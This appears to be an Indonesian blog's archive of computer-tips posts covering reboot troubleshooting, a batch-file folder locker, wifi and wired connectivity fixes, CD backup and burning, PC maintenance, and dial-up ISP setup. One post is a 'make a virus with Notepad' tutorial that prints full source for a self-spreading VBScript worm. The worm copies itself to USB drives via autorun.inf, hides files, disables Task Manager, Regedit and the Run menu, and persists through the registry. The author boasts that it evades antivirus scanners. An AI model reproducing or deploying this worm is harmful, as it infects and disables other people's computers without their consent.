Skip navigation

Category Archives: komputer

Ketika komputer terus reboot pada saat startup dan akan terus menerus restart. Ini adalah salah satu masalah yang paling menjengkelkan yang pernah Anda hadapi. Ketika komputer terus restart sendiri, memang sangat mengesalkan. Apa penyebab komputer menjadi sering reboot sendiri? Ini adalah pertanyaan akan dibahas pada artikel ini.

Bila PC terus reboot pada saat startup, ini bukan berarti komputer anda sudah tidak bisa lagi di perbaiki, tapi ini merupakan masalah sementara yang dapat diatasi. Mengapa komputer Anda terus reboot setelah startup mungkin karena kesalahan system atau hardware yang tidak bekerja dengan normal.

Permasalahan dan Perbaikan

Ketika komputer Anda terus reboot sendiri, bisa karena masalah mendasar yang berhubungan dengan hardware atau masalah perangkat lunak. Apa menjadi kesulitan dalam memecahkan masalah ini adalah bahwa sistem operasi komputer itu sendiri gagal di-load. Berikut ini adalah alasan mengapa PC Anda terus reboot pada saat startup.

1. Masalah Hardware atau Overheating
Masalah pada hardisk, dimana kemungkinan terdapat banyak sektor yang rusak (Bad Sector) sehingga system gagal membaca file system dan memaksa komputer untuk restart. Untuk mengatasi atau memeriksa masalah ini gunakan CD Windows dengan mencalankan scandisk melalui perintah Dos

Masalah Overheating (Hardware Panas), mungkin sulit untuk melacak karena bisa disebabkan oleh kegagalan kipas yang menyebabkan processor panas, atau masalah karena debu yang menempel pada kipas, masalah pasokan listrik penambahan perangkat keras baru. Kecuali Anda seorang teknisi perbaikan komputer, hal ini tidak dianjurkan membuka komputer Anda dan membuka segel garansi. Membersihkan debu lengkap bagian dalam agar kipas angin bekerja dengan normal dan pemeriksaan total hardware akan memecahkan masalah Anda.

Masalah Memory, memory yang tidak tepat pemasangannya, kendur atau kotor dapat membuat komputer restart dengan sendirinya, atau bahkan komputer tidak mau reboot dengan kata lain tidak bisa dioperasikan

2. Problem Bios
Ketika komputer terus restart sendiri, kemungkinan karena BIOS (input dasar / masalah output sistem). BIOS adalah software tetap yang disimpan pada microchip pada PC Anda, yang menangani semua fungsi hardware. Sebuah masalah dengan BIOS, meskipun sangat jarang, tidak dapat dikesampingkan. Ini mungkin merupakan penyebab utama yang mengarah ke situasi dimana PC terus reboot pada startup. Dengan update BIOS dari produsen dapat memecahkan masalah.

3. Instalasi Software yang Kurang benar atau Korupt
Ada alasan lain yang dapat menyebabkan komputer restart, kemungkinan driver yang tidak cocok atau korupsi. Menginstal ulang driver dengan benar dapat mengatasi masalah ini. Untuk memperbaiki file yang rusak, Anda dapat menjalankan recovery disc untuk mengembalikan file yang rusak.

4. Masalah Virus
Virus komputer muncul dalam berbagai bentuk, dan menyebabkan reaksi yang berbeda dalam mesin. Beberapa virus yang paling umum dapat menyebabkan komputer Anda me-reboot sendiri dari waktu ke waktu. Satu-satunya cara untuk memecahkan masalah ini adalah untuk membersihkan PC dari virus sepenuhnya. Anda memerlukan sebuah perangkat lunak antivirus yang efektif untuk tujuan ini, anda harus membersihkan komputer Anda dengan perangkat lunak ini.

Ingat bahwa Anda harus meng-upgrade perangkat lunak antivirus Anda secara berkala, karena virus komputer terus mengadaptasi diri. Jika mesin telah terinfeksi sepenuhnya, Anda harus format seluruh PC, sehingga menyebabkan kehilangan data.

5. System Eror
System eror terjadi bila sebuah file system seperti dll file, file exe dll mengalami kerusakan atau corupt sehingga pada saat komputer reboot komputer tidak dapat menemukan file tersebut dan akhirnya komputer akan restart sendiri

Ada beberapa cara supaya komputer tidak restart otomatis agar dapat melakukan perbaikan

  1. Bila komputer masih bisa dioperasikan sesaat, anda harus mesetting komputer dengan petunjuk berikut Untuk pengguna Windows, Matikan opsi restart otomatis dengan mengklik kanan pada My computer > Advanced System Settings > Hardware > Startup and Recovery dan hapus centang opsi automatic restart, sehingga sistem tidak terus reboot, sehingga anda dapat memperbaiki system.
  2. Dengan menekan tombol F8, bila anda tidak dapat masuk ke system windows, maka yang anda lakukan adalah, pada saat komputer restart, dan setelah komputer membaca sistem bios, tekan tombol F8 sebelum komputer membaca startup windows, Setelah masuk ke pilihan menu, pilih menu Start Windows tanpa restart bila terjadi kesalahan (Disable automatic restart on system Failure)

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Tips komputer kali ini adalah bagaimana menyembunyikan atau mengunci folder pribadi dengan menggunakan notepad. Biasanya untuk mengunci atau menyembunyikan folder itu dengan menggunakan suatu software. Namun notepad juga bisa digunakan untuk mengunci folder. Caranya cukup mudah, anda hanya membuat sebuah kode script pada notepad seperti di bawah ini :

cls
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==type your password here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

  • Pada tulisan “Are you sure u want to Lock the folder” anda bisa mengganti dengan kalimat lain yang intinya menanyakan suatu peringatan untuk mengunci ya atau tidak. Juga pada tulisan “type your password here”, masukkanlah dengan password sesuka anda, password inilah nantinya untuk membuka kembali folder yang terkunci/tersembunyi.
  • Setelah anda mengcopy kode script di atas, kemudian save dengan nama file FolderLock.Bat atau bisa juga nama lain asalkan ekstensinya .Bat bukan .txt
  • Simpanlah di mana saja anda suka, kemudian buka kembali filenya (dobel klik) dan dengan sendirinya akan muncul sebuah folder bernama Locker.
  • Pindahkanlah file atau data yang ingin dikunci atau disembunyikan ke dalam folder Locker tadi.
  • Setelah anda memasukkan file atau data yang ingin disembunyikan, silahkan untuk dobel klik file FolderLock.Bat maka akan muncul kotak dialog seperti di bawah ini :

mengunci folder dengan notepad

  • Ketik Y lalu enter, maka dengan otomatis folder Locker tadi akan hilang. Biasanya juga akan berubah menjadi icon control panel. Ketik N jika ingin membatalkan.
  • Untuk mengembalikannya lagi, buka kembali file FolderLock.Bat tadi kemudian masukkan password anda, lalu enter. (file batch FolderLock.Bat dan folder Locker harus satu directory).

Jika anda mau lebih aman lagi, simpanlah file batch FolderLock.Bat pada tempat yang susah ditemukan orang (folder yang berbeda) kalau perlu dalam flash disk, di mana cuma anda yang tahu. Dan berhubung karena folder Locker (tempat data/file anda disembunyikan) bisa dihapus maka lebih baik anda mengaktifkan hidden file pada folder option.

Sebagai orang yang salah satu tugasnya adalah menjaga keberlangsungan koneksi Internet, saya sering dibuat sibuk dengan adanya permintaan bantuan agar laptop bisa konek dengan Internet via hotspot. Atau kalau tidak, adanya client yang tadinya koneksi Internetnya normal, tiba-tiba suatu hari memunliornocculkan pesan: Limited or No Connectivity. Pesan yang sama juga kadang keluar pada koneksi via wireless. OK. Hari ini saya putuskan untuk menuliskan pengalaman saya soal workaround masalah ini. Bukan berarti saya selalu berhasil. Pada kenyataannya ada orang yang sampai sekarang laptop-nya tetap saja memunculkan pesan itu.
Saya akan urutkan kemungkinan pemecahan masalah “tidak bisa nyambungnya laptop ke Internet” ini dari yang paling stupid sampai yang paling advanced. Sorry saya bilang stupid, soalnya suka ada saja yang aneh-aneh.
Kemungkinannya-kemungkinannya adalah sebagai berikut :

  1. Tidak ada perangkat wireless
    Ini betul-betul terjadi. Seorang mahasiswi datang ke saya dengan laptop Toshiba yang agak tua, lalu ia minta tolong agar laptopnya bisa nyambung ke Internet. Saya lihat, … gimana bisa nyambung ? Laptopnya tidak punya fasilitas Wifi!
  2. Ada perangkatnya tapi tidak ‘on’
    Cukup banyak yang punya laptop (atau nettop) tapi cukup naif pula untuk menggunakannya. Sebuah Sony VAIO yang entah merek apa dengan pemiliknya datang dan minta supaya bisa “konek ke hotspot”. Ketika saya periksa, ada switch on off untuk Wifi dan masih dalam keadaan off. Jelas saja tidak bisa nyambung!. Banyak bahkan pemilik laptop yang tidak tahu posisi switch itu ada di mana!
  3. Sinyal Wifi lemah
    Ada juga yang tidak tahu bahwa tidak bisa konek itu adalah karena berada di luar jangkauan pemancar, atau berada di tempat yang hanya bisa menangkap sinyal yang lemah. Untuk yang seperti ini biasanya saya beritahu bahwa icon kecil di sebelah kanan bawah itu bisa diklik lalu kita bisa pilih “View Available Wireless Network” dan pilih sinyal yang paling kuat.
  4. Driver Wireless tidak terpasang
    Sebuah laptop / nettop barangkali sudah wifi-ready, tapi kalau driver-nya tidak terpasang, tidak mungkin akan bisa terhubung ke jaringan wireless dan mendapat koneksi Internet. Masuk ke device manager lewat My Computer / Computer, lalu masuk ke hardware. Kalau ada tanda seru pada network adapter, ada kemungkinan salah satu adapter tidak terpasang driver-nya. Saya nulis ini nampaknya agak tercampur antara interface XP dan Vista. Pokoknya harus dipastikan driver-nya terpasang.
  5. Perangkat Built-in Wifi rusak / lemah
    Saya kira ini adalah penyebab kenapa setelah diutak-atik gimanapun, laptop / nettop tidak mau konek dengan jaringan. Switch Wifi sudah on, lampu indikator sudah nyala, driver sudah bener, dan sebagainya. Dari semua yang pernah saya tangani, saya pernah mengalami ini satu kali. Solusinya ? Beli laptop / nettop baru, atau beli Adapter Wifi PCMCIA atau USB.
  6. Unpatched Windows XP SP2
    Ternyata Windows XP SP2 membawa masalah pada koneksi ke jaringan wireless. Untuk itu Microsoft menyediakan patch yang harus dipasang. Di situs tentang ini, dijelaskan overview-nya :
    This update helps resolve an issue on computers running Windows XP Service Pack 2. Programs that connect to IP addresses in the loopback address range may not work as expected and you may receive an error message indicating you cannot establish a connection. After you install this item, you may have to restart your computer.
    Direct URL ini patch ini adalah ini. Bila komputer anda menggunakan Windows XP SP2, segera pasang patch itu! (apakah anda akan tanya gimana saya bisa tahu Windows saya adalah SP2? duh ….. )
  7. Alokasi IP habis
    Ini belum pernah saya alami, atau saya hadapi dari orang-orang yang datang. Saya hanya tuliskan di sini sebagai kemungkinan saja. Operator hotspot barangkali hanya mengalokasikan IP terbatas, sehingga ketika sudah penuh, orang yang mau konek tidak kebagian. Dipaksa terus akan konek juga, tapi akan memunculkan ‘Limited or No Connectivity”.
  8. Registry Glitch
    Ini baru saja saya temukan. Dan jujur, saya belum pernah mengalami atau melakukan ini. Ini untuk Windows XP. Ketik string berikut ini pake Notepad, lalu save dengan nama apapun, tapi ekstension-nya *.reg – Lalu klik file itu, dan ikuti perintah berikutnya. String itu adalah :
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPSec]
    “AssumeUDPEncapsulationContextOnSendRule”=dword:00000002
    Tingga copy paste saja dua baris itu ke Notepad. Setelah file itu selesai dieksekusi, komputer harus di restart.
  9. Ethernet Card perlu refresh
    Yang persis saya alami tidak berhubungan dengan koneksi wireless, tapi wired. Ini berlaku untuk komputer yang Ethernet Card-nya on-board atau off board. Kasusnya adalah komputer yang dihubungkan via kabel memunculkan “Limited or no Connectivity” atau kalau pun nyambung tidak mungkin bisa mendapatkan koneksi Internet karena alokasi IP-nya salah / kacau. Mau pake IPCONFIG / RELASE lalu RENEW di DOS pun tidak bisa. Solusinya adalah, kalau Ethernet Card on-board, masuk ke BIOS disable-kan Ethernet, lalu jalankan Windows seperti bisa. Setelah itu, reboot lagi Windows, masuk ke BIOS lagi dan enable kan Ethernet. Stupid it may seem, but it works!
    Kalau Ethernet-nya off-board, ya sama saja prinsipnya. Cabut si Ethernet, lalu jalankan Windows seperti biasa. Lalu matikan komputer. Pasang lagi Ethernet-nya. Nyalakan lagi komputer, dan (kemungkinan besar – semoga) komputer akan bisa nyambung lagi.
    Dengan pengalaman ini saya simpulkan, nampaknya perintah IPCONFIG /release itu tidak benar-benar me-release. Hanya release secara software barangkali. Jadi, Ethernet perlu di release secara fisik!
  10. Turunkan dari 100 ke 10!
    Ini saya alami di wired connection. Kualitas Ethernet card tidak selalu sama. Di bungkusnya mungkin tertulis 10/100 bahkan 10/100/1000. Tapi pada kenyataannya tidak bisa menangani kecepatan yang tinggi. Yang saya alami adalah, ternyata menurunkan kecepatan dari 100 ke 10 bisa membuat koneksi jadi jalan. Caranya, masuk ke device manager, klik kanan Network Adapters, lalu pilih property. Pilih di salah satu menu-nya yang menunjukkan pilihan 10 atau 100, baik full atau half duplex. Pilih saja 10 full duplex langsung dari default auto detect-nya. Kemungkinan besar berhasil.

memback-up harddisk ke cd

cara back-up harddisk ke cd

Bagaimana jika terjadi sesuatu pada komputer yang membuatnya kehilangan semua memori? Dimana semua akan Anda gambar, file dokumen penting dan harus? Totally mereka akan pergi, selamanya. Perangkat lunak Anda juga harus benar-benar dihapus. Bagaimana Anda kembali tanpa CD? Hal-hal seperti ini dapat terjadi dan dilakukan. Hal ini sangat penting untuk cadangan hard drive anda ke CD. Alasan mengapa anda harus are endless.

Ini adalah apa yang anda butuhkan:

Pembakar CD yang terpasang di komputer Anda

CD kosong

1. Klik pada “Start” menu. Daftar datang akan menampilkan pilihan. Pilih “Program” dan klik sekali.

2. Setelah Anda klik pada “Program”, pilihan akan ditampilkan. Klik “Opsi Kontrol Panel” sekali. Ini akan membawa Anda ke tempat Anda dalam sistem komputer yang menyimpan semua file dan memori.

3. Setelah anda klik dan membuka “Control Panel”, namun Anda akan melihat daftar pilihan lain. Pilih “Sistem dan Pemeliharaan.” Klik sekali untuk membukanya. Ini akan membawa Anda ke tempat yang anda butuhkan untuk cadangan hard drive anda ke CD.

4. Di bawah “Sistem dan Pemeliharaan,” akan ada pilihan lain. Memilih pilihan untuk “cadangan Computer.” Dapatkan CD siap.

5. Anda akan melihat dua pilihan yang ditampilkan di bawah “Computer cadangan.” Yang pertama adalah “Backup File” dan yang kedua adalah untuk “Kembalikan Computer.” Pilih “File cadangan” pilihan. Klik sekali. Ini akan memungkinkan Anda untuk membuat salinan cadangan dari semua yang ada di harddisk anda. Memilih untuk membakar copy ke disk. Masukkan CD ketika diminta. File yang akan membakar CD dengan cepat ke atas. Memasukkan CD segar sebagai diarahkan. Sekarang, jika sistem crash dan semua akan hilang, Anda akan memiliki cadangan dari hard drive komputer Anda.

Petunjuk:

Berhati-hatilah ketika klik pada “Control Panel.” Jika file tersebut diubah atau dihapus secara tidak sengaja, komputer Anda tidak akan bekerja dengan b

CARA MEM-BURN DATA KE CD TANPA SOFTWARE PEMBAKAR CD (NERO)

Syarat mutlak
Komputer dengan CD RW
Terinstall Windows XP

Langkah-langkah

  • Pilih Folder atau data yang ada di komputer anda
  • Klik kanan – pilih Send to – pilih “CDRW Drive (e:)”
  • Ulangi langkah pertama dan kedua untuk menambah data lainnya
  • Klik Drive CDRW Anda – Klik kanan – Pilih “Burn these files to CD”
  • Muncul Jendela “CD Writing Wizard” – Ikuti instruksi yang ada
  • Untuk mengganti nama CD yang akan di burn,
  • Ketikkan nama cd pada kolom “CD Name”
  • Ikuti instruksi selanjutnya dengan menekan tombol Next..
  • Komputer akan membeurn Data ke CD anda – tunggu hingga proses selesai dan CD akan keluar secara otomatis

Catatan:
Anda bisa menata struktur Folder dalam CD sebagaimana anda menata folder pada harddisk atau flashdik sesuai dengan keinginan dan selera anda

Published by gempur

Defrag harddisk secara berkala. Fungsi defrag adalah untuk menata dan mengurutkan file-file harddisk berdasarkan jenis file/data sedemikian rupa sehingga akan mempermudah proses read/write sehingga beban kerja akan lebih ringan yg akhirnya dapat memperpanjang umur harddisk. Caranya klik menu Start > Program > Accesories > System Tool > Disk Defragmenter Saat menjalankan fungsi ini tidak boleh ada program lain yg berjalan termasuk screensaver karena akan mengacaukan fungsi defrag ini. 2. Aktifkan screensaver Selain bersifat estetis, screensaver mempunyai fungsi lain yg penting. Monitor CRT juga televisi menggunakan fosfor untuk menampilkan gambar. Kalau monitor menampilkan gambar yg sama untuk beberapa saat maka ada fosfor yang menyala terus menerus. Hal ini dapat mengakibatkan monitor bermasalah yaitu gambar menjadi redup/kurang jelas. Lain halnya jika monitor Anda adalah LCD, LED yg sudah dilengkapi dengan energy saving, maka screensaver tidak terlalu dibutuhkan lagi.Cara+ mengaktifkan screensaver dapat dilakukan dengan banyak cara, salah satunya klik Start > Control Panel > Display > klik tab screensaver, kemudian pilih sesuai selera Anda. 3. Ventilasi yang cukup Tempatkan monitor maupun CPU sedemikian rupa sehingga ventilasi udara dari dan ke monitor / CPU cukup lancar. Ventilasi yg kurang baik akan menyebabkan panas berlebihan sehingga komponen/rangkaian elektronik di dalamnya akan menjadi cepat panas sehingga dapat memperpendek umur komponen tsb. Oleh karena itu usahakan jarak antara monitor/CPU dengan dinding/tembok minimal 30 cm. Kalau perlu pasang kipas angin di dalam ruangan. 4. Pakailah UPS atau stavolt. Pakailah UPS untuk mengantisipasi listrik mati secara tiba-tiba yg dapat mengakibatkan kerusakan pada harddisk. Kalau terpaksa tidak ada UPS, pakailah Stavolt untuk mengantisipasi naik turunnya tegangan listrik. 5. Tutup / close program yg tidak berguna Setiap program yg diload atau dijalankan membutuhkan memory (RAM) sehingga semakin banyak program yg dijalankan semakin banyak memory yg tersita. Hal ini selain dapat menyebabkan komputer berjalan lambat (lelet) juga beban kerja menjadi lebih berat yg akhirnya dapat memperpendek umur komponen/komputer. 6. Install program antivirus dan update secara berkala Untuk dapat mengenali virus/trojan2 baru sebaiknya update program antivirus secara berkala. Virus yg terlanjur menyebar di komputer dapat membuat Anda menginstall ulang komputer. Hal ini selain membutuhkan biaya juga akan menyebabkan harddisk Anda akan lebih cepat rusak dibanding apabila tidak sering diinstall ulang.

SETTING KOMPUTER

Untuk melakukan hubungan ke internet, diperlukan persyaratan teknis antara lain sebagai berikut:

Perangkat keras komputer :
. Prosesor minimum 486 DX, disarankan Pentium
. Ram minimum 8 Mb, disarankan 16 Mb
. modem kecepatan minimal 14.4 kbps, disarankan kecepatan yang lebih tinggi. SijiwaeNet        mendukung kecepatan modem 56 kbps dengan protokol V.90.
. saluran telepon, sebaiknya yang tidak menggunakan pengganda saluran (pairgain) atau pun WLL (telepon via radio). Pengganda saluran akan memperlambat kecepatan akses.

Perangkat lunak :
. Windows 3.1, 95 atau lebih. (tentunya dapat juga dipakai sistem operasi lain)
. Pada Windows telah diinstalasi ‘Dial up networking’ dan berfungsi dengan baik.
. Telah terpasang protokol TCP/IP pada windows.
. Software browser (untuk menjelajah internet). Bila belum punya dapat di download di sini (Internet Explorer, Netscape).

Cara instalasi komputer

Bila persyaratan tersebut diatas telah dipenuhi, maka anda siap melakukan instalasi komputer dengan mengikuti langkah-langkah sebagai berikut :

1.  Instalasi modem, bagaimana cara memasang modem agar dikenali oleh komputer anda.
2.  Seting dial up, mengatur modem agar dapat terkoneksi ke internet.
3.  Setting DNS.

SETTING MODEM

Langkah pertama untuk melakukan koneksi internet adalah menginstalasi modem. Modem merupakan perangkat perantara antara komputer anda dengan saluran telepon agar dapat berhubungan dengan ISP (Internet Service Provider – penyedia jasa internet) anda.

1. Klik Start, pilih Settings,pilih Control Panel. Maka akan muncul window Control Panel.

2. Pada windows Control Panel, pilih icon Modem dan klik dua kali sehingga muncul window Instal New Modem (bagi yang pernah memasang modem sebelumnya makan akan tampil window Modem Properties. Bila anda ingin menambah driver modem baru, klik Add).

Windows dapat melakukan deteksi otomatis terhadap perangkat modem yang telah terpasang pada PC anda, tapi hal ini terbatas pada modem yang telah dikenali oleh Windows. Apabila anda memilih deteksi otomatis, maka kosongkan kotak Don’t detect my modem, lalu tekan Next.

Apabila anda memiliki modem jenis baru dan disertai file driver (dalam disket / CDROM), sebaiknya anda memilih deteksi manual sehingga dapat memanfaatkan feature terbaru dari modem tersebut (misal kemampuan support 56 kBps, fax, voice, dll). Untuk itu pilih kotak Don’t detect my modem, dan tekan Next.

3. Pada menu selanjutnya ditampilkan daftar modem yang telah dikenali dan tersedia drivernya oleh Windows. Pilih type modem yang sesuai dengan modem anda, lalu tekan Next.

Apabila anda tidak memiliki file driver, maka anda dapat memilih type Standard Modem, misalnya dengan kecepatan 28800 bps, lalu tekan Next lalu anda dapat langsung menuju ke langkah 5.

Apabila anda memiliki file driver (disket / CDROM) yang disediakan pabrikan, maka pasang disket / CDROM tersebut, lalu tekan tombol Have Disk.

4. Pada menu selanjutnya muncul window Install From Disk. Masukkan disket / CDROM yang berisi file driver modem anda, pilih dirive yang sesuai (A:\ atau pilih CDROM, lokasi lain menggunakan menu Browse).

5. Apabila file driver berhasil di ambil, maka akan muncul window mengenai driver tersebut (pada contoh ini, driver modemnya V90 & K56Flex DATA-FAX-VOICE Modem, yang memiliki kemampuan s/d 56 kBps). Pilih driver yang sesuai (bila lebih dari satu), selanjutnya tekan Next.

6. Setelah selesai, maka anda harus menentukan port komunikasi (COM) dimana modem tersebut terpasang. Sebagai contoh, dipilih port COM1 karena biasanya modem terpasang pada port tersebut (kecuali dipakai untuk media lain). Kemudian tekan Next.

Pada tahap ini bila dilakukan dengan benar, maka modem akan terpasang pada PC anda. Klik Finish untuk mengakhiri setup modem Anda. Untuk melakuan koneksi internet, anda harus melakukan setting dial up untuk menentukan nomor telepon ISP yang menyediakan akses internet. Cara melakukan setting dial up dapat dilihat pada halaman ini.

Setelah selesai tahap ini, anda dapat melakukan

SETTING DIAL-UP

Setting dial up diperlukan untuk menentukan nomor telepon ISP yang akan di-dial oleh modem anda. Setiap kali akan menggunakan internet, anda harus melakukan hubungan dial up untuk membangun koneksi dengan ISP anda.

1. Klik dua kali icon My Computer untuk memunculkan window My Computer.

2. Klik dua kali icon Dial Up Networking. Setelah muncul window Dial up Networking, klik dua kali icon Make New Connection. Pada window Make New Connection, masukkan nama sijiwae pada kolom pertama untuk nama komputer yang akan di-dial dan pilih jenis modem yang telah diinstalasi. Tekan Next.

SijiwaeNet menggunakan nomor akses khusus yang tidak memerlukan kode area, karena itu kosongkan pada kolom area code. Ketik nomor telepon akses SijiwaeNet pada kolom nomor telepon, yaitu 0 809 8 9999, klik Next.

3. Setting koneksi selesai, klik Finish. Pada tahap ini anda telah berhasil melakukan setting dial up yang ditandai dengan keluarnya icon SijiwaeNet pada window Dial Up Networking.

Setelah selesai tahap ini, anda dapat melakukan

SETTING PROXY

Seting proxy server dapat dilakukan melalui aplikasi browser (baik Internet Explorer / IE maupun Netscape Navigator).

Untuk IE versi 5.O
1. Jalankan IE, klik  menu Tools, lalu pilih Internet Options. Maka akan muncul window Internet Options, pilih tab Connection sehingga muncul seperti dibawah.

Nggak bisa konek ?

Jika anda mengalami kesulitan mengakses Telkomnet Instan, jangan keburu menelpon atau mengirim surat. Silakan lakukan Pertolongan Pertama Pada Telkomnet-Instan (P3TI) :
Lakukan pengecekan step-by-step berikut :

1. Cek saluran telepon
Angkat telepon, dengarkan nada tone :

Apabila anda mendengar nanda nada tone (tuuuttt…) panjang tanpa terputus, berarti telepon anda baik dan anda dapat melanjutkan ke langkah selanjutnya.

Anda tidak mendengar nada sama sekali. Kemungkinan saluran telepon anda putus, baik putus di dalam rumah maupun di jaringan Telkom. Coba cek perkabelan di dalam rumah, atau cek pada kotak terminal pembagi (tempat persambungan antara jaringan Telkom dan jaringan dalam rumah). Apabila kerusakan ada di jaringan Telkom, laporkan ke 117.

